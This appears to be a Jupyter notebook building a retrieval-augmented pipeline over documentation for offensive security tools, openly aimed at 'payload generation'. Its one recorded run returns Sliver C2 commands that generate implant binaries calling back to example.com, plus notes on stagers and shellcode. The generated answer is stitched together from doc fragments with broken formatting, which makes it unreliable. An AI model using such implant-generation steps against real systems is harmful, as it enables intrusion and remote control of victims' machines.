# **Initialization**

In [1]:
!pip install langchain huggingface_hub sentence-transformers transformers langchain-community faiss-cpu faiss-gpu langchain-huggingface torch
!export PYTORCH_CUDA_ALLOC_CONF=expandable_segments:True


Collecting langchain
  Downloading langchain-0.3.0-py3-none-any.whl.metadata (7.1 kB)
Collecting sentence-transformers
  Downloading sentence_transformers-3.1.1-py3-none-any.whl.metadata (10 kB)
Collecting langchain-community
  Downloading langchain_community-0.3.0-py3-none-any.whl.metadata (2.8 kB)
Collecting faiss-cpu
  Downloading faiss_cpu-1.8.0.post1-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl.metadata (3.7 kB)
Collecting faiss-gpu
  Downloading faiss_gpu-1.7.2-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl.metadata (1.4 kB)
Collecting langchain-huggingface
  Downloading langchain_huggingface-0.1.0-py3-none-any.whl.metadata (1.3 kB)
Collecting langchain-core<0.4.0,>=0.3.0 (from langchain)
  Downloading langchain_core-0.3.5-py3-none-any.whl.metadata (6.3 kB)
Collecting langchain-text-splitters<0.4.0,>=0.3.0 (from langchain)
  Downloading langchain_text_splitters-0.3.0-py3-none-any.whl.metadata (2.3 kB)
Collecting langsmith<0.2.0,>=0.1.17 (from langchain)


# **RAG + LLM for payload generation**

In [2]:
import os
from langchain.chains import RetrievalQA
from langchain.prompts import PromptTemplate
from langchain_huggingface import HuggingFaceEmbeddings, HuggingFaceEndpoint
from langchain.vectorstores import FAISS
from langchain.text_splitter import MarkdownTextSplitter
from langchain.schema import Document
from IPython.display import Markdown, display
from transformers import AutoTokenizer, AutoModelForCausalLM
import torch
import gc



# Funzione per caricare i file .md dalla directory manualmente
def load_markdown_documents(directory: str):
    documents = []
    for filename in os.listdir(directory):
        if filename.endswith(".md"):
            filepath = os.path.join(directory, filename)
            with open(filepath, "r", encoding="utf-8") as file:
                content = file.read()
                documents.append(Document(page_content=content, metadata={"source": filename}))
    return documents

def create_retriever(documents):
    print("Inizio creazione del retriever...")

    embeddings = HuggingFaceEmbeddings(model_name="sentence-transformers/all-MiniLM-L6-v2")
    splitter = MarkdownTextSplitter(chunk_size=400, chunk_overlap=100)
    split_docs = splitter.split_documents(documents)
    print(f"Numero di documenti : {len(split_docs)}")

    texts = [doc.page_content for doc in split_docs]
    vector_store = FAISS.from_texts(texts, embeddings)
    #restituisce i top 10
    retriever = vector_store.as_retriever(search_kwargs={"k": 10})  


    #from langchain.vectorstores import Annoy

    #vector_store = Annoy.from_texts(texts, embeddings)
    #retriever = vector_store.as_retriever()

    print("Retriever creato con successo")
    return retriever


#Caricamento del modello generativo
def create_huggingface_model_local():
    global model
    #model_name = "EleutherAI/gpt-neo-1.3B"
    #model_name= "KimByeongSu/gpt-neo-1.3B_LAMA_TREx_finetuning_MAGNET_same"
    model_name="ricepaper/vi-gemma-2b-RAG"
    tokenizer = AutoTokenizer.from_pretrained(model_name)
    model = AutoModelForCausalLM.from_pretrained(model_name)
    device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
    model = model.to(device)

    def generate_text(prompt, max_length=2048, temperature=0.8):
        print("Avvio del modello per la generazione del testo...")
        inputs = tokenizer(prompt, return_tensors="pt").to(device)
        with torch.no_grad():
            outputs = model.generate(
            inputs['input_ids'],
            attention_mask=inputs['attention_mask'],  # Passa l'attenzione mask
            max_length=2048,            # Ridotto ulteriormente per evitare output lunghi e ripetitivi
            do_sample=True,            # Campionamento abilitato per la varietà
            pad_token_id=tokenizer.eos_token_id,
            temperature=0.8,           # Migliora la creatività
            top_k=100,                  # Aumentato per fornire più opzioni durante la generazione
            top_p=0.95,                 # Probabilità cumulativa controllata
            repetition_penalty=2.5,     # Penalizza ripetizioni eccessive di token
            num_beams=5,                # Beam search per maggiore coerenza
            early_stopping=True        # Ferma la generazione quando una condizione è soddisfatta
            )
            return tokenizer.decode(outputs[0], skip_special_tokens=True)
    return generate_text

def create_rag_chain(retriever, generate_text_fn):
    def rag_chain(query):
        relevant_docs = retriever.invoke(query)

        context = "\n".join([doc.page_content for doc in relevant_docs])
        full_prompt = f"{context}\n\nDomanda: {query}"
        
        generated_text = generate_text_fn(full_prompt)
        return generated_text, relevant_docs
    
    return rag_chain

# Funzione per fare una query al sistema RAG
def query_rag(chain, query):
    result, source_documents = chain(query)
    
    return result, source_documents

# Funzione per svuotare la RAM della GPU
def optimizer_gpu():
        model.to("cpu")
        print("Memoria dopo la generazione")
        print(f"Memory allocated: {torch.cuda.memory_allocated()}")
        print(f"Memory reserved: {torch.cuda.memory_reserved()}")
        torch.cuda.empty_cache()
        gc.collect()
        print("Memoria dopo l'ottimizzazione")
        print(f"Memory allocated: {torch.cuda.memory_allocated()}")
        print(f"Memory reserved: {torch.cuda.memory_reserved()}")
        model.to("cuda")
        

# Esecuzione del sistema
while True:
    if __name__ == "__main__":
        directory = "/kaggle/input/docs-tools"

        documents = load_markdown_documents(directory)
        retriever = create_retriever(documents)

        # Usa il modello locale invece dell'endpoint remoto
        generate_text_fn = create_huggingface_model_local()

        rag_chain = create_rag_chain(retriever, generate_text_fn)

        query = input("Inserisci una query :")
        response, docs = query_rag(rag_chain, query)

        print("Risposta generata:", response)

        print(f"Numero di documenti utilizzati: {len(docs)}")
        j=0

        for doc in docs:
            j=j+1
            print(f"\nDocumento sorgente {j}:", doc.page_content)
               

            
        
        #Visualizza in markdown
        i=int(input("Digita un numero maggiore di 0 per visualizzare la risposta in markdown"))
        if(i>0):
                print("         =================================================")
                display(Markdown(response))
                i=0
                i=int(input("Vuoi salvare l'output come file markdown? In tal caso digita un numero maggiore di 0"))
                if(i>0):
                    # Salvataggio del contenuto nel file Markdown
                    filename=input("Inserisci il nome del file")
                    with open(filename, "w") as file:
                        file.write(response)
        i=0
        optimizer_gpu()




Inizio creazione del retriever...


modules.json:   0%|          | 0.00/349 [00:00<?, ?B/s]

config_sentence_transformers.json:   0%|          | 0.00/116 [00:00<?, ?B/s]

README.md:   0%|          | 0.00/10.7k [00:00<?, ?B/s]

sentence_bert_config.json:   0%|          | 0.00/53.0 [00:00<?, ?B/s]

config.json:   0%|          | 0.00/612 [00:00<?, ?B/s]

model.safetensors:   0%|          | 0.00/90.9M [00:00<?, ?B/s]

tokenizer_config.json:   0%|          | 0.00/350 [00:00<?, ?B/s]

vocab.txt:   0%|          | 0.00/232k [00:00<?, ?B/s]

tokenizer.json:   0%|          | 0.00/466k [00:00<?, ?B/s]

special_tokens_map.json:   0%|          | 0.00/112 [00:00<?, ?B/s]



1_Pooling/config.json:   0%|          | 0.00/190 [00:00<?, ?B/s]

Numero di documenti : 6103
Retriever creato con successo


tokenizer_config.json:   0%|          | 0.00/40.6k [00:00<?, ?B/s]

tokenizer.model:   0%|          | 0.00/4.24M [00:00<?, ?B/s]

tokenizer.json:   0%|          | 0.00/17.5M [00:00<?, ?B/s]

special_tokens_map.json:   0%|          | 0.00/636 [00:00<?, ?B/s]

config.json:   0%|          | 0.00/751 [00:00<?, ?B/s]

model.safetensors.index.json:   0%|          | 0.00/13.5k [00:00<?, ?B/s]

Downloading shards:   0%|          | 0/2 [00:00<?, ?it/s]

model-00001-of-00002.safetensors:   0%|          | 0.00/4.95G [00:00<?, ?B/s]

model-00002-of-00002.safetensors:   0%|          | 0.00/67.1M [00:00<?, ?B/s]

Loading checkpoint shards:   0%|          | 0/2 [00:00<?, ?it/s]

generation_config.json:   0%|          | 0.00/132 [00:00<?, ?B/s]

Inserisci una query : Give me an example of how to use the generate command in Sliver.


Avvio del modello per la generazione del testo...
Risposta generata: If all you have is a Windows machine, the easiest way to build Sliver is using [WSL](https://docs.microsoft.com/en-us/windows/wsl/install-win10) and following the Linux/cross-compile instructions above. To cross-compile a native Windows binary use `make windows` and copy it to your Windows file system (i.e. `/mnt/c/Users/foo/Desktop`) and run it using a terminal that supports ANSI sequences such
```

# Sliver v1.5.x
```
sliver > generate --mtls example.com --save /Users/moloch/Desktop --os mac

[*] Generating new darwin/amd64 Sliver binary
[*] Build completed in 00:00:09
[*] Sliver binary saved to: /Users/moloch/Desktop/PROPER_ANTHONY
```
sliver > generate --http example.com --os mac

[*] Generating new darwin/amd64 implant binary
[*] Build completed in 00:00:05
[*] Implant saved to /Users/moloch/Desktop/WORKING_HACIENDA
```
sliver > generate --http example.com/foo/bar

[*] Generating new windows/amd64 implant binary


Digita un numero maggiore di 0 per visualizzare la risposta in markdown 4




If all you have is a Windows machine, the easiest way to build Sliver is using [WSL](https://docs.microsoft.com/en-us/windows/wsl/install-win10) and following the Linux/cross-compile instructions above. To cross-compile a native Windows binary use `make windows` and copy it to your Windows file system (i.e. `/mnt/c/Users/foo/Desktop`) and run it using a terminal that supports ANSI sequences such
```

# Sliver v1.5.x
```
sliver > generate --mtls example.com --save /Users/moloch/Desktop --os mac

[*] Generating new darwin/amd64 Sliver binary
[*] Build completed in 00:00:09
[*] Sliver binary saved to: /Users/moloch/Desktop/PROPER_ANTHONY
```
sliver > generate --http example.com --os mac

[*] Generating new darwin/amd64 implant binary
[*] Build completed in 00:00:05
[*] Implant saved to /Users/moloch/Desktop/WORKING_HACIENDA
```
sliver > generate --http example.com/foo/bar

[*] Generating new windows/amd64 implant binary
[*] Build completed in 00:00:05
[*] Implant saved to /Users/moloch/Desktop/IMPRESSED_METHANE
For this to work, we need the following pieces:

- a staging server (the Sliver server)
- a stage 2 payload (usually a Sliver shellcode, but can be in other formats)
- stagers (generated by `msfvenom`, the Sliver `generate stager` command, or a custom one)

## Example
```

**IMPORTANT:** The Sliver Makefile requires version information from the git repository, so you must `git clone` the repository. Using GitHub's "download zip" feature may omit the `.git` directory and result in broken builds.

This will create `sliver-server` and `sliver-client` binaries.

### Cross-compile to Specific Platforms
```
sliver > builders
Sliver implants are cross-platform, you can change the compiler target with the `--os` flag. Sliver accepts any Golang GOOS and GOARCH as arguments `--os` and `--arch`, we officially only support Windows, MacOS, and Linux, but you can at least attempt to compile for any other [valid Golang GOOS/GOARCH](https://gist.github.com/asukakenji/f15ba7e588ac42795f421b48b8aede63) combination. The `generate
# Sliver v1.6.x

- Go v1.21 or later
- `make`, `sed`, `tar`, `curl`, `zip`, `cut` commands; most of these are installed by default but you may need to install `make`, `curl`, and `zip` depending on your distribution. On MacOS you may need to install XCode and accompanying cli tools.

```asciinema
{"src": "/asciinema/compile-from-source.cast", "cols": "132"}

Domanda: Give me an example of how to use the generate command in Sliver.
```
sliver > generate --mtls example.com --save /Users/moloch/Desktop --os mac

[*] Generating new darwin/amd64 Sliver binary
[*] Build completed in 00:00:09
[*] Sliver binary saved to: /Users/moloch/Desktop/PROPER_ANTHONY
```
sliver > generate --http example.com --os mac

[*] Generating new darwin/amd64 implant binary
[*] Build completed in 00:00:05
[*] Implant saved to /Users/moloch/Desktop/WORKING_HACIENDA


Vuoi salvare l'output come file markdown? In tal caso digita un numero maggiore di 0 0


KeyboardInterrupt: 